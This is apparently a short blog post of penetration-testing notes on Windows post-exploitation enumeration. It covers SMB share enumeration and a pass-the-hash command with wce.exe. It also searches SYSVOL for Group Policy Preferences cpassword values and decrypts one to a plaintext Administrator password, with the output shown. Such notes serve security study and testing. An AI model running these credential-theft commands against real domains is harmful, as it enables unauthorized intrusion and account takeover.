Windows Enumeration - Post Exploitation 



nmap --script smb-enum-shares.nse -p445 IP
 
 
enum4linux
 
 

Browse shares for passwords, look on the domain controller for passwords in Group Policy Preferences (GPP) that can be decrypted:

C:\> wce.exe -s john-pc:securus:aad3b435b51404eeaad3b435b51404ee:2fb3672702973ac1b9ade0acbdab432f



C:\> findstr /S cpassword \\dc1.securus.corp.com\sysvol\*.xml
\\192.168.122.55\sysvol\securus.corp.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml: ="" description="" cpassword="1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="1" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/> 



C:\> ruby gppdecrypt.rb 1MJPOM4MqvDWWJq5IY9nJqeUHMMt6N2CUtb7B/jRFPs
1q2w3e4r5t



 




=============================================================================




LDAP ports open TCP 389




ldapsearch -x -h host_or_domain.local -s base namingcontexts






Tells you the permissions of files in Windows on the domain.




smbcacls -N '//IP_or_HOSTNAME/share' /Users

































































No comments:















Post a Comment


























        

      









Subscribe to:
Posts (Atom)